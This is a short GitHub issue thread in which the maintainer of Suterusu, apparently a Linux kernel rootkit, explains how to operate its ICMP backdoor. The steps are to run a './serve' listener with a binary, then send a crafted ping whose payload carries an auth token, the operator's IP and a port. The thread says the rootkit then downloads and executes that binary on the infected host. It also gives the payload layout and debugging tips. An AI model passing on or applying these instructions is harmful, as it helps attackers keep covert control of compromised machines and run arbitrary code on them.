### ISSUE TITLE
How to use ICMP modules

### ISSUE THREAD

**Issue by isafe** [mncoppola/suterusu#8]
Hello:
  How to use ICMP modules? I compile ICMP modules,but i don't know how to use it

**Comment by mncoppola** [comment]
Hi, if I remember correctly there are two steps:

1. Compile and run ./serve (./serve <port> <binary>)
2. ping 1.2.3.4 -p <hex AUTH_TOKEN><hex your IP address><hex port number> -s 10
(Suterusu is basically casting the payload of the ICMP packet to https://github.com/mncoppola/suterusu/blob/master/icmp.c#L9 and checking against that.  It also verifies the payload is 10 bytes large, i.e. AUTH_TOKEN=4, IP address=4, port number=2)

Then Suterusu should receive the ICMP packet, detect that it's a special packet, and download + execute the binary.  If you're having issues getting it to trigger, I'd recommend turning on debugging and watching dmesg.

**Comment by isafe** [comment]
I got it,Thank you!
